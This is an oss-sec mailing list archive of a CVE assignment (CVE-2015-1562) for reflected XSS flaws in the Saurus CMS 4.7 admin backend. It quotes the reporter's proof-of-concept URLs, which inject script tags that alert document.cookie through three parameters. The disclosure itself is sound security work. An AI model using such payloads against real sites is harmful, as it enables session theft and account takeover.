oss-sec mailing list archives
Re: CVE-Request -- Saurus CMS v.4.7 (Community Edition, released: 12.08.2014) -- Multiple reflecting XSS vulnerabilities
From: cve-assign () mitre org
Date: Sun, 8 Feb 2015 22:35:52 -0500 (EST)
I found multiple reflecting XSS vulnerabilities in the administrative backend of the content management system Saurus CMS v. 4.7 (Community Edition, released: 12.08.2014). The parameters used in the following PHP files are prone to reflecting XSS attacks (including exploit examples): user_management.php (vulnerable parameter: "search"): http:// {TARGET}/admin/user_management.php?tmpuser_search=1&tmpgroup_search=1&tmpsearch_subtree=1&search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&user_search=1&group_search=1&group_search=1&flt_role=&keepThis=true&id=&op=&keel=&group_id=1&view=overview_false&user_id=&user_prev_id=&user_next_id= profile_data.php (vulnerable parameter: "data_search"): http:// {TARGET}/admin/profile_data.php?data_search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--&profile_search=&profile_id=0 error_log.php (vulnerable parameter: "filter"): http:// {TARGET}/admin/error_log.php?id=&op=&keel=&group_id=1&otsi=1&page=&filter=bla&algus=31.12.2014&lopp=07.01.2015&err_type=&otsi=1&page=&filter=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C!--&algus=31.12.2014&lopp=07.01.2015&err_type= Vendor patched this vulnerability in the latest commit of Saurus CMS v. 4.7 (CE, released: 27.01.2015). Could you please assign a CVE-ID for this?
Use CVE-2015-1562. --- CVE assignment team, MITRE CVE Numbering Authority M/S M300 202 Burlington Road, Bedford, MA 01730 USA [ PGP key available through http://cve.mitre.org/cve/request_id.html ]
Current thread:
- CVE-Request -- Saurus CMS v.4.7 (Community Edition, released: 12.08.2014) -- Multiple reflecting XSS vulnerabilities Steffen Rösemann (Jan 27)
- Re: CVE-Request -- Saurus CMS v.4.7 (Community Edition, released: 12.08.2014) -- Multiple reflecting XSS vulnerabilities cve-assign (Feb 08)